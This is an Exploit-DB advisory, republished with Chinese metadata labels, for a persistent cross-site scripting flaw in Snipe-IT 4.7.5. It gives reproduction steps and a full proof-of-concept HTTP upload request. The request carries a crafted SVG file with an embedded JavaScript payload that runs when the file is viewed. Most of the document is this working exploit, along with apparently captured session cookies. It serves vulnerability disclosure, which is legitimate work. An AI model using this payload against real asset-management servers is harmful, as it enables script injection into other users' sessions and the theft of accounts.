Snipe-IT Open Source Asset Management 4.7.5 – Persistent Cross-Site Scripting

  • 作者: Metin Yunus Kandemir
    日期: 2019-12-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47756/
  • # Exploit Title: Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting
    # Exploit Author: Metin Yunus Kandemir (kandemir)
    # Vendor Homepage: https://snipeitapp.com/
    # Software Link: https://github.com/snipe/snipe-it/releases/tag/v4.7.5
    # Version: 4.7.5
    # Category: Webapps
    # Tested on: Xampp for Windows
    
    # Description:
    # Snipe-IT v4.7.5 has persistent cross-site scripting vulnerability via uploading svg file in accessories section.
    # A malicious authorized user could potentially upload an SVG with a javascript payload.
    
    #Steps to Reproduce:
    
    Upload crafted SVG file when sent request to create accessory.
    Click created accessory and copy uploaded file location.
    Browse uploaded SVG file location on browser.
    The alert box will be opened.
    
    #(PoC) Post Request:
    
    POST /accessories HTTP/1.1
    Host: target
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://target/accessories/create
    Content-Type: multipart/form-data; boundary=---------------------------6547029722068941066578895105
    Content-Length: 1761
    Cookie: XSRF-TOKEN=eyJpdiI6Ikh1TURMRnpyVDJsaVh4WUI5MWtQWnc9PSIsInZhbHVlIjoiUUNOcVErbFpcL0hGbmVveU9wYzZlOWRrVXNBbWxqeDBQZ3drbW4yZ2RXWU1POGlQQnVOeG5EcThxaUUraGdSYmlCMmNIc2VMMERxYnJOWDRBRUhmdEx3PT0iLCJtYWMiOiI2ZTg5YTA2MmUxZWRmM2RjYTNmNzI4YTE0YTQyOTQ4MGEzMDYyYWJiMDk5NGYwOWE4M2Y4ZTc4MWMxYzJhOGY1In0%3D; snipeitv4_session=KvsAzbhBKlUwbijPmLc86vCgO0PhG67J6EIIR0MD; laravel_token=eyJpdiI6InRTXC83Qmx0aDdVTE9EbVJzSnJ4V01nPT0iLCJ2YWx1ZSI6InVITklNQ3h3WldXMFIzY01Ob0Zqb1wvdm1NQTZXN3JuXC9Nc0g5Z0lpWXZCaTdiVHFOUVB4ZkpmQWRrVk1ZWVZFN1dZVnRrM3pRdjRCcWxySDRtd3hEWlIxd0h5QThUMDAyaVJcL0YzTmhFMlVlNzVFSG95S2VVYVBiRzNzNUtIOTkwdlBWUmQ1K3dTZHNNeXZJWVNmaWczb2hyOGFWRmI1a1NiNk84a1wvOW1tWXpleTMzSnRwYlowenBHSzN4dHRzd2lUTXd1b1dLNkluMEt2bWE0M1J4UTBaNGMzTGFQWEVOWnNyQk1aQk1nQ0tBejVjUU9XRnc5Q0l0citqSnJlbzgwTEVWQlN5ekdZa2hYckQ5T1ZKc2E2UT09IiwibWFjIjoiZDZhNWE2NjFmOTMwOWI0N2E2NjE3YTQwNWFlYjg0MmMyYTkwYzE1YTc4ZWI3N2U1ZWFjNGIyMzM4ZWU2NjczMyJ9
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    .
    ..
    snip
    ..
    .
    
    Content-Disposition: form-data; name="image"; filename="test.svg"
    Content-Type: image/svg+xml
    
    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
    <script type="text/javascript">
    alert(1);
    </script>
    </svg>
    
    -----------------------------6547029722068941066578895105--